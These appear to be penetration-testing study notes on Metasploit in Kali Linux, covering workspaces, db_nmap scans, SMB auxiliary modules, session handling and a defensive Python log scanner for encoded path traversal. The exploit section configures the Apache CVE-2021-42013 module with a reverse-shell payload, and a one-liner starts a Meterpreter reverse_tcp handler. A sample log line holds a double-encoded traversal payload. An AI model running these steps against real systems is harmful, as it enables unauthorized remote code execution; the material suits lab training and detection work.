Metasploit Framework (MSF) in Kali Linux doesn't start its database (PostgreSQL) by default, but the database is useful for storing target data and tracking exploits.
MSF uses workspaces to keep separate tests apart and avoid mixing up their data.
# Check current workspace
msf6 > workspace
# Create a new workspace
msf6 > workspace -a test_ws
[*] Added workspace: test_ws
# Switch to a specific workspace
msf6 > workspace test_ws
[*] Workspace: test_ws
# Check current workspace again (the active one is marked with *)
msf6 > workspace
default
* test_ws
Scan results will now be saved in the selected workspace.
# Scan target
msf6 > db_nmap -A 192.168.50.202
# List discovered hosts
msf6 > hosts
# List discovered services
msf6 > services
# List hosts with port 445 (e.g., SMB service)
msf6 > services -p 445
Modules
MSF includes modules for various purposes, categorized for ease of use.
# List module categories
msf6 > show -h
Auxiliary
Auxiliary modules perform tasks like scanning, fuzzing, and enumeration.
# List all auxiliary modules
msf6 > show auxiliary
# Filter modules by type
msf6 > search type:auxiliary smb
# Filter by name (e.g., SMB version scanner)
msf6 > search smb_version
# Use a specific module
msf6 > use 0
# View module info
msf6 auxiliary(scanner/smb/smb_version) > info
# List module options
msf6 auxiliary(scanner/smb/smb_version) > show options
# List required options that are not yet set
msf6 auxiliary(scanner/smb/smb_version) > show missing
# Set required options
msf6 auxiliary(scanner/smb/smb_version) > set RHOSTS 192.168.50.202
# Run module
msf6 auxiliary(scanner/smb/smb_version) > run
Exploit
Exploit modules in MSF target specific vulnerabilities in applications or services.
Key features:
Database Integration: Automatically tracks targets, services, and vulnerabilities.
Reliability: Repeatable sessions for stable access.
Payload Flexibility: Users can select payloads based on the exploit.
# Create a workspace for exploits
msf6 > workspace -a exploits
msf6 > workspace exploits
# Set target host globally (setg applies the value to every module)
msf6 > setg RHOSTS 192.168.225.16
# Search for CVE-2021-42013 exploit
msf6 > search CVE-2021-42013
# Select exploit module
msf6 > use 0
# Configure payload and options
msf6 exploit(multi/http/apache_normalize_path_rce) > set LHOST 192.168.45.242
msf6 exploit(multi/http/apache_normalize_path_rce) > set SSL false
msf6 exploit(multi/http/apache_normalize_path_rce) > set RPORT 80
msf6 exploit(multi/http/apache_normalize_path_rce) > set payload linux/x64/shell_reverse_tcp
# Run exploit
msf6 exploit(multi/http/apache_normalize_path_rce) > run
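From the defender's side, the module above targets path normalization in Apache HTTP Server (CVE-2021-42013), so the matching check is to look for requests whose path only reveals ".." segments after percent-decoding. The following is an added example, not part of the original notes: it assumes an Apache access log that records the raw request line, and the function names and sample log lines are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Request field of an Apache common/combined log line: "METHOD target PROTOCOL"
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
MAX_ROUNDS = 5  # cap on decoding passes so a crafted value cannot loop forever


def decode_depth(target):
    """Percent-decode the path until it stops changing; return (passes, path)."""
    path = target.split("?", 1)[0]
    rounds = 0
    while rounds < MAX_ROUNDS:
        decoded = unquote(path, errors="replace")
        if decoded == path:
            break
        path, rounds = decoded, rounds + 1
    return rounds, path


def is_encoded_traversal(target):
    """True when '..' segments appear only after percent-decoding."""
    raw_path = target.split("?", 1)[0]
    _, final = decode_depth(target)
    return ".." in final.split("/") and ".." not in raw_path.split("/")


def scan(lines):
    """Yield (line_number, target, decoding_passes) for each suspicious request."""
    for number, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        if match and is_encoded_traversal(match["target"]):
            yield number, match["target"], decode_depth(match["target"])[0]


# Constructed sample lines (not taken from a real server)
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /index.html HTTP/1.1" 200 512',
    '192.0.2.11 - - [01/Jan/2024:10:00:05 +0000] "GET /docs/a%20b.html HTTP/1.1" 200 90',
    '192.0.2.12 - - [01/Jan/2024:10:00:09 +0000] "POST /cgi-bin/.%%32%65/.%%32%65/etc/hosts HTTP/1.1" 200 40',
    '192.0.2.13 - - [01/Jan/2024:10:00:12 +0000] "GET /icons/%2e%2e/x HTTP/1.1" 400 0',
]

if __name__ == "__main__":
    for number, target, rounds in scan(SAMPLE_LOG):
        print(f"line {number}: {target} (decoded in {rounds} passes)")
```

A path that needs two or more decoding passes before the ".." shows up is the stronger signal, since ordinary clients do not double-encode dots.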
Sessions & Jobs
Sessions manage interactions with successfully exploited targets. Jobs run in the background.
# Background the current session
^Z
Background session 1? [y/N] y
# List active sessions
msf6 > sessions -l
# Interact with a session
msf6 > sessions -i 1
# Close a session
msf6 > sessions -k 1
Inline Commands
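# Start msfconsole without the banner (-q) and run the given commands (-x); "exploit -j" starts the handler as a background job
$ msfconsole -q -x "use exploit/multi/handler; set PAYLOAD linux/x64/meterpreter/reverse_tcp; set LHOST 192.168.45.157; set LPORT 9999; exploit -j"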